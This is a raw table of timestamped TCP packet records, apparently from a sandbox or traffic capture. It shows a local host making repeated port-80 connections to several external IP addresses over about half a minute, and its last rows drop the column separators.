                Aug 23, 2024 04:19:22.189163923 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.195242882 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.195259094 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.195274115 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.195368052 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.276439905 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276458979 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276473999 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276575089 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276592016 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.276732922 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276890039 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276905060 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276918888 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.276937008 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.276966095 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.277503014 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.277518988 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.277534008 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.277570009 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.277671099 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.278646946 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.278661966 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.278676033 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.278693914 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.278700113 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.278742075 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.279561996 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.279577017 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.279632092 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.279706001 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.279721975 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.279818058 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.280638933 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.280654907 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.280670881 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.280710936 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.283130884 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.283181906 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.283272982 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.335117102 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.337866068 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.337923050 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:22.337996006 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.340368032 CEST | 49745 | 80 | 192.168.2.4 | 208.91.197.27
                Aug 23, 2024 04:19:22.345202923 CEST | 80 | 49745 | 208.91.197.27 | 192.168.2.4
                Aug 23, 2024 04:19:36.077275991 CEST | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:36.083049059 CEST | 80 | 49746 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:36.083492041 CEST | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:36.087420940 CEST | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:36.092370987 CEST | 80 | 49746 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:36.939379930 CEST | 80 | 49746 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:36.939646959 CEST | 80 | 49746 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:36.939694881 CEST | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:37.600836992 CEST | 49746 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:38.621459007 CEST | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:38.626430988 CEST | 80 | 49747 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:38.631367922 CEST | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:38.631367922 CEST | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:38.636256933 CEST | 80 | 49747 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:39.479496956 CEST | 80 | 49747 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:39.479520082 CEST | 80 | 49747 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:39.479593039 CEST | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:40.147716045 CEST | 49747 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:41.167083025 CEST | 49748 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:41.173563004 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.173635960 CEST | 49748 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:41.175853014 CEST | 49748 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:41.183020115 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183031082 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183074951 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183083057 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183089972 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183099985 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183109999 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183119059 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:41.183146000 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:42.069999933 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:42.070128918 CEST | 80 | 49748 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:42.073477983 CEST | 49748 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:42.679440022 CEST | 49748 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:43.697487116 CEST | 49749 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:43.702510118 CEST | 80 | 49749 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:43.702616930 CEST | 49749 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:43.704086065 CEST | 49749 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:43.709919930 CEST | 80 | 49749 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:44.581557989 CEST | 80 | 49749 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:44.582104921 CEST | 80 | 49749 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:44.582619905 CEST | 49749 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:44.585764885 CEST | 49749 | 80 | 192.168.2.4 | 43.252.167.188
                Aug 23, 2024 04:19:44.590692043 CEST | 80 | 49749 | 43.252.167.188 | 192.168.2.4
                Aug 23, 2024 04:19:49.750222921 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:49.755357027 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:49.755431890 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:49.766351938 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:49.771367073 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.401520967 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.401580095 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.401617050 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.401643991 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:50.401652098 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.401712894 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.401738882 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:50.401742935 CEST | 80 | 49750 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:50.403529882 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:51.288371086 CEST | 49750 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.307447910 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.312463999 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.315881968 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.319443941 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.324280977 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981643915 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981703997 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981740952 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981754065 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.981776953 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981818914 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981822968 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.981851101 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.981895924 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:52.990809917 CEST | 80 | 49751 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:52.990864992 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:53.819793940 CEST | 49751 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:54.839449883 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:54.844521046 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.844600916 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:54.846965075 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:54.853800058 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.853849888 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.853877068 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.853904963 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.853938103 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.853964090 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.853991032 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.854034901 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:54.854062080 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506321907 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506383896 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506421089 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506438971 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:55.506455898 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506494999 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:55.506496906 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506531000 CEST | 80 | 49752 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:55.506582022 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:56.375447035 CEST | 49752 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:57.821971893 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:57.826999903 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:57.827104092 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:57.828607082 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:57.833425045 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472203016 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472410917 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472443104 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472498894 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472511053 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:58.472532988 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472567081 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472592115 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:58.472604036 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:19:58.472687960 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:58.477513075 CEST | 49753 | 80 | 192.168.2.4 | 194.9.94.85
                Aug 23, 2024 04:19:58.482494116 CEST | 80 | 49753 | 194.9.94.85 | 192.168.2.4
                Aug 23, 2024 04:20:03.927136898 CEST | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:03.932074070 CEST | 80 | 49754 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:03.933548927 CEST | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:03.935277939 CEST | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:03.940100908 CEST | 80 | 49754 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:05.444683075 CEST | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:05.490637064 CEST | 80 | 49754 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:06.462726116 CEST | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:06.633562088 CEST | 80 | 49755 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:06.633728027 CEST | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:06.637464046 CEST | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:06.642488956 CEST | 80 | 49755 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:08.147805929 CEST | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:08.194698095 CEST | 80 | 49755 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.167121887 CEST | 49756 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:09.176125050 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.176188946 CEST | 49756 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:09.178349018 CEST | 49756 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:09.183346987 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183409929 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183438063 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183465958 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183495045 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183542013 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183587074 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183633089 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:09.183659077 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:10.695239067 CEST | 49756 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:10.742754936 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:11.712774992 CEST | 49757 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:11.717959881 CEST | 80 | 49757 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:11.718050957 CEST | 49757 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:11.719743013 CEST | 49757 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:11.724618912 CEST | 80 | 49757 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:25.305588961 CEST | 80 | 49754 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:25.305639982 CEST | 49754 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:28.007882118 CEST | 80 | 49755 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:28.013618946 CEST | 49755 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:30.552658081 CEST | 80 | 49756 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:30.552774906 CEST | 49756 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:33.106061935 CEST | 80 | 49757 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:33.106163979 CEST | 49757 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:33.107108116 CEST | 49757 | 80 | 192.168.2.4 | 23.251.54.212
                Aug 23, 2024 04:20:33.112358093 CEST | 80 | 49757 | 23.251.54.212 | 192.168.2.4
                Aug 23, 2024 04:20:38.145514965 CEST | 49758 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:38.150465965 CEST | 80 | 49758 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:38.151606083 CEST | 49758 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:38.155503988 CEST | 49758 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:38.160274029 CEST | 80 | 49758 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:39.664203882 CEST | 49758 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:39.728748083 CEST | 80 | 49758 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:39.728801966 CEST | 49758 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:40.682153940 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:40.687072992 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:40.689865112 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:40.693533897 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:40.698422909 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281512976 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281532049 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281543016 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281555891 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281572104 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281582117 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281590939 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281605005 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281610966 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:41.281615973 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281625986 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.281651974 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:41.281673908 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:41.286499023 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.286509037 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.286519051 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.286540031 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:41.335227013 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:41.367990017 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.368005037 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.368017912 CEST | 80 | 49759 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:41.368050098 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:41.368066072 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:42.197541952 CEST | 49759 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:43.214024067 CEST | 49760 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:43.218919992 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.218986034 CEST | 49760 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:43.221774101 CEST | 49760 | 80 | 192.168.2.4 | 199.192.19.19
                Aug 23, 2024 04:20:43.226686954 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226741076 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226751089 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226758957 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226768017 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226784945 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226794004 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226836920 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.226861000 CEST | 80 | 49760 | 199.192.19.19 | 192.168.2.4
                Aug 23, 2024 04:20:43.985950947 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.985970020 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.985980988 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.985991955 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986005068 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986022949 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986036062 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986057997 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:43.986073017 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986083984 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986109018 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:43.986140966 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.986170053 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:43.986219883 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:43.990900993 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.990948915 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.990961075 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.990971088 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:43.991075039 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:44.139226913 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:44.139244080 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:44.139251947 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:44.139266968 CEST8049760199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:44.139336109 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:44.139383078 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:44.729727983 CEST4976080192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:45.744821072 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:45.749830961 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:45.749898911 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:45.751596928 CEST4976180192.168.2.4199.192.19.19
                Aug 23, 2024 04:20:45.756407022 CEST8049761199.192.19.19192.168.2.4
                Aug 23, 2024 04:20:46.355967045 CEST8049761199.192.19.19192.168.2.4
